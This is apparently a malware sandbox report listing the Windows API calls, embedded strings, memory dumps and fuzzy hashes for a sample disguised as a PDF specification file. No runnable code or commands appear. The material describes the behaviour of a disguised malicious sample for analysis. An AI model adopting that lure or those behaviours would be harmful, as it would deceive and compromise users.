                                      • GetWindowRect.USER32(?,?), ref: 0037EB4E
                                      • SetWindowTextW.USER32(?,?), ref: 0037EBB9
                                      • GetDesktopWindow.USER32 ref: 0037EBBF
                                      • GetWindowRect.USER32(00000000), ref: 0037EBC6
                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0037EC12
                                      • GetClientRect.USER32(?,?), ref: 0037EC1F
                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0037EC44
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0037EC6F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: 6f0b6abd46a7001f5aadb42b08d665a40024e672a914b82b0a749e09760e9603
                                      • Instruction ID: 39cda3c6a697ca2337cc38e58a1171a5f9f2bc809f7184b0dccb1cb79b7dd885
                                      • Opcode Fuzzy Hash: 6f0b6abd46a7001f5aadb42b08d665a40024e672a914b82b0a749e09760e9603
                                      • Instruction Fuzzy Hash: C0513E71900709EFDB229FA8CD89F6EBBB9FF08705F014968E586A65A0C774B954CB10
                                      Function 003979B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 003979C6
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 003979D1
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 003979DC
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 003979E7
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 003979F2
                                      • LoadCursorW.USER32(00000000,00007F81), ref: 003979FD
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00397A08
                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00397A13
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00397A1E
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00397A29
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00397A34
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00397A3F
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00397A4A
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00397A55
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00397A60
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00397A6B
                                      • GetCursorInfo.USER32(?), ref: 00397A7B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Cursor$Load$Info
                                      • String ID:
                                      • API String ID: 2577412497-0
                                      • Opcode ID: 694829a61f14b06ba95ccbcea83713461934d0e091c4bc68ec55f874e73e4d9e
                                      • Instruction ID: 1b130968be9272ff62e6572bb23cec31e4df6dd993529a517a355476f572175b
                                      • Opcode Fuzzy Hash: 694829a61f14b06ba95ccbcea83713461934d0e091c4bc68ec55f874e73e4d9e
                                      • Instruction Fuzzy Hash: 663105B1D4831A6ADF119FB68C8995FBFE8FF04750F50453AE50DE7281DA78A5008FA1
                                      Function 003A716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 003A71FC
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003A7247
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 3974292440-4258414348
                                      • Opcode ID: c80c94c9f1e605d485f74bf290907829681397bcd3d309ca07bbebe63d56caae
                                      • Instruction ID: 9c89048318e965a8e0b3b03471a0f1eb01f4f4b0b3658b8309ec7472eaf7cafd
                                      • Opcode Fuzzy Hash: c80c94c9f1e605d485f74bf290907829681397bcd3d309ca07bbebe63d56caae
                                      • Instruction Fuzzy Hash: 7B915D342086019BCB16EF20C891A6EB7E5EF95310F01885DFD965F7A2DB35ED0ACB81
                                      Function 0037CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnumChildWindows.USER32(?,0037CF50), ref: 0037CE90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ChildEnumWindows
                                      • String ID: 4+?$CLASS$CLASSNN$H+?$INSTANCE$L+?$NAME$P+?$REGEXPCLASS$T+?$TEXT
                                      • API String ID: 3555792229-2490583668
                                      • Opcode ID: 2d39a9b6fff271e29b683ba1af4af483c50d2d6876bb9f64f57d0d5eec66136c
                                      • Instruction ID: 4a2bb34ad5da400e001ffca32fcc130f889408ea8bd9e6035e09632547b61d6a
                                      • Opcode Fuzzy Hash: 2d39a9b6fff271e29b683ba1af4af483c50d2d6876bb9f64f57d0d5eec66136c
                                      • Instruction Fuzzy Hash: 2191913061050AABCB2ADF60C481BEAFBB5BF04300F54D51DE95DAB551DF34A99ACBD0
                                      Function 003ACE58 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 205windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?), ref: 003ACF73
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003ACFF4
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003AD016
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AD025
                                      • DestroyWindow.USER32(?), ref: 003AD042
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00340000,00000000), ref: 003AD075
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AD094
                                      • GetDesktopWindow.USER32 ref: 003AD0A9
                                      • GetWindowRect.USER32(00000000), ref: 003AD0B0
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003AD0C2
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003AD0DA
                                        • Part of subcall function 0035B526: GetWindowLongW.USER32(?,000000EB), ref: 0035B537
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 1652260434-3619404913
                                      • Opcode ID: 94be17654b0db67ba8c045c16fa1c8cd016cc1224ab7645e66319d3cceb9ab89
                                      • Instruction ID: c6e2130b3dc8896fd1a3756a632261699c0fab780b05e397009c2779a3256c7a
                                      • Opcode Fuzzy Hash: 94be17654b0db67ba8c045c16fa1c8cd016cc1224ab7645e66319d3cceb9ab89
                                      • Instruction Fuzzy Hash: DB71DFB0140305AFD722CF28CC85FA677E9FB89704F44492DF9869B2A1DB35E942CB16
                                      Function 003AE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003AE5AB
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003ABEAF), ref: 003AE607
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE647
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE68C
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE6C3
                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,003ABEAF), ref: 003AE6CF
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003AE6DF
                                      • DestroyIcon.USER32(?,?,?,?,?,003ABEAF), ref: 003AE6EE
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003AE70B
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003AE717
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 1446636887-1154884017
                                      • Opcode ID: 306d49ce2621c0426b0cb58505c8eec9925d14c25b0cefbbae91a2f60ff6d9de
                                      • Instruction ID: 742b4c65c9a6934e2c3ec08a649afd0fbad1888905ee502d16be8042959b6063
                                      • Opcode Fuzzy Hash: 306d49ce2621c0426b0cb58505c8eec9925d14c25b0cefbbae91a2f60ff6d9de
                                      • Instruction Fuzzy Hash: 1A61CF71500215BAEB26DF64CC46FBE77ACFB1A714F108615F915EA0E1EBB0E980CB60
                                      Function 003AF351 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 178windowfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • DragQueryPoint.SHELL32(?,?), ref: 003AF37A
                                        • Part of subcall function 003AD7DE: ClientToScreen.USER32(?,?), ref: 003AD807
                                        • Part of subcall function 003AD7DE: GetWindowRect.USER32(?,?), ref: 003AD87D
                                        • Part of subcall function 003AD7DE: PtInRect.USER32(?,?,003AED5A), ref: 003AD88D
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003AF3E3
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003AF3EE
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003AF411
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003AF458
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003AF471
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 003AF488
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 003AF4AA
                                      • DragFinish.SHELL32(?), ref: 003AF4B1
                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003AF59C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                      • API String ID: 221274066-3440237614
                                      • Opcode ID: 2865a2c9f20b6dfb4c302c7821f9df1c4730997015217ea3a598d49f39086c71
                                      • Instruction ID: c6baa9641be7134ff092253bb59d60627e2fd312a92699374e38bc11b0f64025
                                      • Opcode Fuzzy Hash: 2865a2c9f20b6dfb4c302c7821f9df1c4730997015217ea3a598d49f39086c71
                                      • Instruction Fuzzy Hash: B1613C71508304AFC316DF64CC85D9FBBF8EF89710F404A2EF695961A1DB71A609CB52
                                      Function 0038D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?), ref: 0038D292
                                      • GetDriveTypeW.KERNEL32 ref: 0038D2DF
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D327
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D35E
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D38C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: SendString$BuffCharDriveLowerType
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 1600147383-4113822522
                                      • Opcode ID: f84590f0de5a066e584e14a46c43776b93f3a8df65cad2c9e90aeebffd0ee4da
                                      • Instruction ID: 3b827cb8fe581c93abc0ed1dc24a2966ddee087777841fbaad2400664db9bee8
                                      • Opcode Fuzzy Hash: f84590f0de5a066e584e14a46c43776b93f3a8df65cad2c9e90aeebffd0ee4da
                                      • Instruction Fuzzy Hash: 57514C755047059FC702EF11C88196EB7E8EF99714F10486DF886AB2A1DB71EE0ACB42
                                      Function 003AE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003ABEF4,?,?), ref: 003AE754
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE76B
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE776
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE783
                                      • GlobalLock.KERNEL32(00000000), ref: 003AE78C
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE79B
                                      • GlobalUnlock.KERNEL32(00000000), ref: 003AE7A4
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE7AB
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE7BC
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,003CD9BC,?), ref: 003AE7D5
                                      • GlobalFree.KERNEL32(00000000), ref: 003AE7E5
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 003AE809
                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003AE834
                                      • DeleteObject.GDI32(00000000), ref: 003AE85C
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003AE872
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3840717409-0
                                      • Opcode ID: 90e742fd12fe5f9a37dd3013e9b5857326f799871122e257e25b595b1921d990
                                      • Instruction ID: c867fe0c6de31c15ee0560f62a82c1a845bfb9b11ae441fa9b6a0c81145e7567
                                      • Opcode Fuzzy Hash: 90e742fd12fe5f9a37dd3013e9b5857326f799871122e257e25b595b1921d990
                                      • Instruction Fuzzy Hash: 8A413A75600204FFDB129F65DC48EAABBBCEF8AB11F104468F905D7260D735AD41DB60
                                      Function 0038AAF8 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 374timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 0038AB3D
                                      • VariantCopy.OLEAUT32(?,?), ref: 0038AB46
                                      • VariantClear.OLEAUT32(?), ref: 0038AB52
                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0038AC40
                                      • VarR8FromDec.OLEAUT32(?,?), ref: 0038AC9C
                                      • VariantInit.OLEAUT32(?), ref: 0038AD4D
                                      • SysFreeString.OLEAUT32(00000016), ref: 0038ADDF
                                      • VariantClear.OLEAUT32(?), ref: 0038AE35
                                      • VariantClear.OLEAUT32(?), ref: 0038AE44
                                      • VariantInit.OLEAUT32(00000000), ref: 0038AE80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                      • API String ID: 1234038744-3931177956
                                      • Opcode ID: ded74f5dd73ddae5c4581c212d0b8308622737fbbc621e86f8801cd3686da65d
                                      • Instruction ID: d0464086f354161bffc2ede770456dc978555c60f9255d279da3cb452a3f9378
                                      • Opcode Fuzzy Hash: ded74f5dd73ddae5c4581c212d0b8308622737fbbc621e86f8801cd3686da65d
                                      • Instruction Fuzzy Hash: C7D1FE71A00B05DBEF23AF65C884B6AB7B9FF04700F1584A6E8059F590DB70EC44DBA2
                                      Function 003A3C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: $E?$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 3964851224-1016100088
                                      • Opcode ID: 3366fb4f8b9b295463a4911f8482509a8074cb676cf06a159f4400b491dd8be6
                                      • Instruction ID: f8e90384901d19ae562fa84e83bdfda071a3fa850a44779aeb92a29af93f0c06
                                      • Opcode Fuzzy Hash: 3366fb4f8b9b295463a4911f8482509a8074cb676cf06a159f4400b491dd8be6
                                      • Instruction Fuzzy Hash: F0413B3411024A8BCF07EF14D851AEB3365EF23340F514865FC956F2A2EB70EA4ACB50
                                      Function 0037A867 Relevance: 19.7, APIs: 13, Instructions: 178memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                        • Part of subcall function 0037ABBB: GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                        • Part of subcall function 0037ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                        • Part of subcall function 0037ABBB: HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                        • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                        • Part of subcall function 0037AC56: GetProcessHeap.KERNEL32(00000008,0037A6B5,00000000,00000000,?,0037A6B5,?), ref: 0037AC62
                                        • Part of subcall function 0037AC56: HeapAlloc.KERNEL32(00000000,?,0037A6B5,?), ref: 0037AC69
                                        • Part of subcall function 0037AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0037A6B5,?), ref: 0037AC7A
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0037A8CB
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0037A8FF
                                      • GetLengthSid.ADVAPI32(?), ref: 0037A910
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0037A94D
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0037A969
                                      • GetLengthSid.ADVAPI32(?), ref: 0037A986
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0037A995
                                      • HeapAlloc.KERNEL32(00000000), ref: 0037A99C
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0037A9BD
                                      • CopySid.ADVAPI32(00000000), ref: 0037A9C4
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0037A9F5
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0037AA1B
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0037AA2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 1795222879-0
                                      • Opcode ID: 88be91a9b8f1059385e12bb0b41b0701e793e30de096489c723642fade13c0af
                                      • Instruction ID: dc4b1dd3540a7bd6bbb80fea157af3c986e89ea2203c1110344ed7a22aba5386
                                      • Opcode Fuzzy Hash: 88be91a9b8f1059385e12bb0b41b0701e793e30de096489c723642fade13c0af
                                      • Instruction Fuzzy Hash: 01514B71900619ABDF22DF94DD45EEEBB79FF48300F048129F915EB290D7389A15CB61
                                      Function 003AEEEB Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 229windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003AEF3B
                                      • GetFocus.USER32 ref: 003AEF4B
